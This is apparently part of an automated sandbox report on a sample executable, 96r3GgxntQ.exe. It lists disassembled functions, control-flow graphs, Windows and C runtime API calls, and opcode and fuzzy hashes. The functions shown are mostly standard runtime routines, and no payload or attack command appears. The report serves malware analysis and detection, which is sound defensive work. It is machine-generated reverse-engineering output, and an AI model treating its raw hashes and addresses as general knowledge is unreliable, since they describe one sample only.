                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 0445c287705b2f3d169057d78cb1c5e7e52d0324c0c1d69034d43b5495bcf33f
                                                                                                                                                                                                                                                          • Instruction ID: bcd8c7b89eb0c4f30251702f6688b514bac857e57ef2024a1a6da6d93af3034c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0445c287705b2f3d169057d78cb1c5e7e52d0324c0c1d69034d43b5495bcf33f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2116376A10148EFCB41EF96DD42CE93BB5FF44750F5141A6BA088B262DBB1DE509B80
                                                                                                                                                                                                                                                          Function 00BB7AB4 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 165 bb7ab4-bb7acd 166 bb7acf-bb7adf call bb82cc 165->166 167 bb7ae3-bb7ae8 165->167 166->167 174 bb7ae1 166->174 169 bb7aea-bb7af2 167->169 170 bb7af5-bb7b19 MultiByteToWideChar 167->170 169->170 172 bb7b1f-bb7b2b 170->172 173 bb7cac-bb7cbf call bb123a 170->173 175 bb7b7f 172->175 176 bb7b2d-bb7b3e 172->176 174->167 178 bb7b81-bb7b83 175->178 179 bb7b5d-bb7b63 176->179 180 bb7b40-bb7b4f call bbac20 176->180 182 bb7b89-bb7b9c MultiByteToWideChar 178->182 183 bb7ca1 178->183 185 bb7b64 call bb62ff 179->185 180->183 193 bb7b55-bb7b5b 180->193 182->183 187 bb7ba2-bb7bbd call bb5a15 182->187 188 bb7ca3-bb7caa call bb646a 183->188 186 bb7b69-bb7b6e 185->186 186->183 190 bb7b74 186->190 187->183 197 bb7bc3-bb7bca 187->197 188->173 194 bb7b7a-bb7b7d 190->194 193->194 194->178 198 bb7bcc-bb7bd1 197->198 199 bb7c04-bb7c10 197->199 198->188 202 bb7bd7-bb7bd9 198->202 200 bb7c5c 199->200 201 bb7c12-bb7c23 199->201 205 bb7c5e-bb7c60 200->205 203 bb7c3e-bb7c44 201->203 204 bb7c25-bb7c34 call bbac20 201->204 202->183 206 bb7bdf-bb7bf9 call bb5a15 202->206 208 bb7c45 call bb62ff 203->208 209 bb7c9a-bb7ca0 call bb646a 204->209 217 bb7c36-bb7c3c 204->217 205->209 210 bb7c62-bb7c7b call bb5a15 205->210 206->188 221 bb7bff 206->221 214 bb7c4a-bb7c4f 208->214 209->183 210->209 222 bb7c7d-bb7c84 210->222 214->209 219 bb7c51 214->219 223 bb7c57-bb7c5a 217->223 219->223 221->183 224 bb7cc0-bb7cc6 222->224 225 bb7c86-bb7c87 222->225 223->205 226 bb7c88-bb7c98 WideCharToMultiByte 224->226 225->226 226->209 227 bb7cc8-bb7ccf call bb646a 226->227 227->188
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00BB54C8,00000000,?,?,?,00BB7D05,?,?,00000100), ref: 00BB7B0E
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00BB7B46
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00BB7D05,?,?,00000100,5EFC4D8B,?,?), ref: 00BB7B94
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00BB7C2B
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BB7C8E
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB7C9B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00BB7E5B,?,00000000,?,00BB686F,?,00000004,00000000,?,?,?,00BB3BCD), ref: 00BB6331
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB7CA4
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB7CC9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2597970681-0
                                                                                                                                                                                                                                                          • Opcode ID: 141265ab88147155bd412bad4c5cb3ebb0ac113345f0f2bb5ef669c84c5eeb03
                                                                                                                                                                                                                                                          • Instruction ID: 468ba174bb1de16daffb2f1c0832e393b3e1d19abf0e4b4731e7e0efc1a89cf1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 141265ab88147155bd412bad4c5cb3ebb0ac113345f0f2bb5ef669c84c5eeb03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E51CE72654606AFEB259E64CC81EFB7BEAEB84750F1546ACF804E6140EFB4DC40C690
                                                                                                                                                                                                                                                          Function 00BB8417 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 230 bb8417-bb8474 GetConsoleCP 231 bb847a-bb8496 230->231 232 bb85b7-bb85c9 call bb123a 230->232 233 bb8498-bb84af 231->233 234 bb84b1-bb84c2 call bb6052 231->234 236 bb84eb-bb84fa call bb72b7 233->236 242 bb84e8-bb84ea 234->242 243 bb84c4-bb84c7 234->243 236->232 244 bb8500-bb8520 WideCharToMultiByte 236->244 242->236 245 bb858e-bb85ad 243->245 246 bb84cd-bb84df call bb72b7 243->246 244->232 247 bb8526-bb853c WriteFile 244->247 245->232 246->232 253 bb84e5-bb84e6 246->253 249 bb85af-bb85b5 GetLastError 247->249 250 bb853e-bb854f 247->250 249->232 250->232 252 bb8551-bb8555 250->252 254 bb8583-bb8586 252->254 255 bb8557-bb8575 WriteFile 252->255 253->244 254->231 257 bb858c 254->257 255->249 256 bb8577-bb857b 255->256 256->232 258 bb857d-bb8580 256->258 257->232 258->254
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00BB8B8C,?,00000000,?,00000000,00000000), ref: 00BB8459
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00BB84D4
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00BB84EF
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00BB8515
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00BB8B8C,00000000,?,?,?,?,?,?,?,?,?,00BB8B8C,?), ref: 00BB8534
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00BB8B8C,00000000,?,?,?,?,?,?,?,?,?,00BB8B8C,?), ref: 00BB856D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                          • Opcode ID: cb9e7848c41236f7bdb719c3f75b0e3678ac46d980e871c2d4e92bd75ce45d78
                                                                                                                                                                                                                                                          • Instruction ID: ae78bb4b6db284429be556f2d386cbc0444fe224db0f6161ab119160fb766ea9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb9e7848c41236f7bdb719c3f75b0e3678ac46d980e871c2d4e92bd75ce45d78
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57517371E002499FDB20CFA8DC85AFEBBF9EF19300F14455AE955E7291DBB09941CBA0
                                                                                                                                                                                                                                                          Function 00BB1E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 259 bb1e00-bb1e51 call bbac80 call bb1dc0 call bb2377 266 bb1ead-bb1eb0 259->266 267 bb1e53-bb1e65 259->267 268 bb1eb2-bb1ebf call bb2360 266->268 269 bb1ed0-bb1ed9 266->269 267->269 270 bb1e67-bb1e7e 267->270 275 bb1ec4-bb1ecd call bb1dc0 268->275 272 bb1e80-bb1e8e call bb2300 270->272 273 bb1e94 270->273 282 bb1e90 272->282 283 bb1ea4-bb1eab 272->283 274 bb1e97-bb1e9c 273->274 274->270 277 bb1e9e-bb1ea0 274->277 275->269 277->269 280 bb1ea2 277->280 280->275 284 bb1eda-bb1ee3 282->284 285 bb1e92 282->285 283->275 286 bb1f1d-bb1f2d call bb2340 284->286 287 bb1ee5-bb1eec 284->287 285->274 293 bb1f2f-bb1f3e call bb2360 286->293 294 bb1f41-bb1f5d call bb1dc0 call bb2320 286->294 287->286 289 bb1eee-bb1efd call bbaac0 287->289 295 bb1f1a 289->295 296 bb1eff-bb1f17 289->296 293->294 295->286 296->295
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00BB1E37
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00BB1E3F
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00BB1EC8
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00BB1EF3
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00BB1F48
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: 1ee18148f0f0d4b0bed1eb2cf63ff9c9facc4ab700ee7ae16938210231ea07d7
                                                                                                                                                                                                                                                          • Instruction ID: 4234bb1dd2a05139890d0fe306c2df91441eb825a81e136407a47a72911addc6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ee18148f0f0d4b0bed1eb2cf63ff9c9facc4ab700ee7ae16938210231ea07d7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC41B034A00208ABCF10DF6CC891AFEBBF5EF45354F5488D5E818AB292D7B1E901CB90
                                                                                                                                                                                                                                                          Function 00BB621B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 305 bb621b-bb6226 306 bb62fc-bb62fe 305->306 307 bb622c-bb62f9 call bb61df * 5 call bb4869 * 3 call bb61df * 5 call bb4869 * 4 305->307 307->306
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00BB61DF: _free.LIBCMT ref: 00BB6208
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6269
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6274
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB627F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB62D3
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB62DE
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB62E9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB62F4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                          • Instruction ID: 32107758355707f15aee5b90a82a4c4d66876e440ed445db0a3a6ed97f402477
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD114C71540B14ABD620BBB5CC07FEB77ECAF40700F404865B69EB6093EBB9BE048690
                                                                                                                                                                                                                                                          Function 00BB3D8F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 342 bb3d8f-bb3d9c 343 bb3db9-bb3e05 call bb4869 * 4 342->343 344 bb3d9e-bb3daa 342->344 344->343 345 bb3dac-bb3db3 call bb4869 344->345 345->343
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DAD
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DBF
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DD2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DE3
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3DF4
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID: (?z
                                                                                                                                                                                                                                                          • API String ID: 776569668-554794068
                                                                                                                                                                                                                                                          • Opcode ID: faef84b0383e0ebbf8b7436884feb33075f9301f88557aec971b3fcacc1ba083
                                                                                                                                                                                                                                                          • Instruction ID: ec4a06af71cdfd1a89b58bf81b8034621153ee75d66eb8dfa4c058788cd99871
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faef84b0383e0ebbf8b7436884feb33075f9301f88557aec971b3fcacc1ba083
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F0B779900260DF97516F19FC01DA93BB0FB9EB203450AA6F512B72B3CFB589518AC1
                                                                                                                                                                                                                                                          Function 00BB23D1 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 356 bb23d1-bb23d8 357 bb23da-bb23dc 356->357 358 bb23dd-bb23f8 GetLastError call bb26a4 356->358 361 bb23fa-bb23fc 358->361 362 bb2411-bb2413 358->362 363 bb2457-bb2462 SetLastError 361->363 364 bb23fe-bb240f call bb26df 361->364 362->363 364->362 367 bb2415-bb2425 call bb3f67 364->367 370 bb2439-bb2449 call bb26df 367->370 371 bb2427-bb2437 call bb26df 367->371 377 bb244f-bb2456 call bb3ec5 370->377 371->370 376 bb244b-bb244d 371->376 376->377 377->363
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00BB23C8,00BB209F,00BB1AFC), ref: 00BB23DF
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BB23ED
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BB2406
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00BB23C8,00BB209F,00BB1AFC), ref: 00BB2458
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 7c5bae2c7ea88f58a43c3be7fa10c26e4e40773239b55e0d3f24b616f1518006
                                                                                                                                                                                                                                                          • Instruction ID: 86b6a0475fe88f92c6cc41db0c84ad2aa1546af866e6d97ec24fc90bb02ce64e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c5bae2c7ea88f58a43c3be7fa10c26e4e40773239b55e0d3f24b616f1518006
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C801F7721083155FAA2427B8BC85EF72BD4DB067F572003B9FA20926E5EFD18C819250
                                                                                                                                                                                                                                                          Function 00BB4424 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 380 bb4424-bb4438 GetLastError 381 bb443a-bb4444 call bb5904 380->381 382 bb4446-bb444b 380->382 381->382 387 bb448f-bb449a SetLastError 381->387 384 bb444d call bb480c 382->384 386 bb4452-bb4458 384->386 388 bb445a 386->388 389 bb4463-bb4471 call bb595a 386->389 390 bb445b-bb4461 call bb4869 388->390 394 bb4473-bb4474 389->394 395 bb4476-bb448d call bb4296 call bb4869 389->395 398 bb449b-bb44a7 SetLastError call bb3f24 390->398 394->390 395->387 395->398
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,00BB6D69,?,?,?,00BC04C8,0000002C,00BB3F34,00000016,00BB209F,00BB1AFC), ref: 00BB4428
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB445B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4483
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00BB4490
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00BB449C
                                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 00BB44A2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                                          • Opcode ID: 1e3ac23dfb8ba5d75e11b9d77ab8edbad00f10e04401132e128bad5dc14dfb19
                                                                                                                                                                                                                                                          • Instruction ID: 0ec158417e4d26f7e266e976d39c7ae1ea354784417839e5ec90a6af53fb52e5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e3ac23dfb8ba5d75e11b9d77ab8edbad00f10e04401132e128bad5dc14dfb19
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F0C831500640ABC6227739AC59FFB26EAFBC1771B254594F528E3393EFF1C9115161
                                                                                                                                                                                                                                                          Function 00BB2F53 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 404 bb2f53-bb2f60 405 bb2f7e-bb2fa7 call bb522b GetModuleFileNameA 404->405 406 bb2f62-bb2f66 404->406 412 bb2fa9-bb2fac 405->412 413 bb2fae 405->413 406->405 407 bb2f68-bb2f79 call bb47f9 call bb473d 406->407 418 bb3072-bb3076 407->418 412->413 415 bb2fb0-bb2fda call bb3077 call bb31ec 412->415 413->415 422 bb2fe8-bb3005 call bb3077 415->422 423 bb2fdc-bb2fe6 call bb47f9 415->423 429 bb301d-bb3030 call bb4d46 422->429 430 bb3007-bb3014 422->430 428 bb3019-bb301b 423->428 431 bb3067-bb3071 call bb4869 428->431 436 bb3032-bb3035 429->436 437 bb3037-bb3040 429->437 430->428 431->418 438 bb305d-bb3064 call bb4869 436->438 439 bb304a-bb3057 437->439 440 bb3042-bb3048 437->440 438->431 439->438 440->439 440->440
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\96r3GgxntQ.exe,00000104), ref: 00BB2F93
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB305E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB3068
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
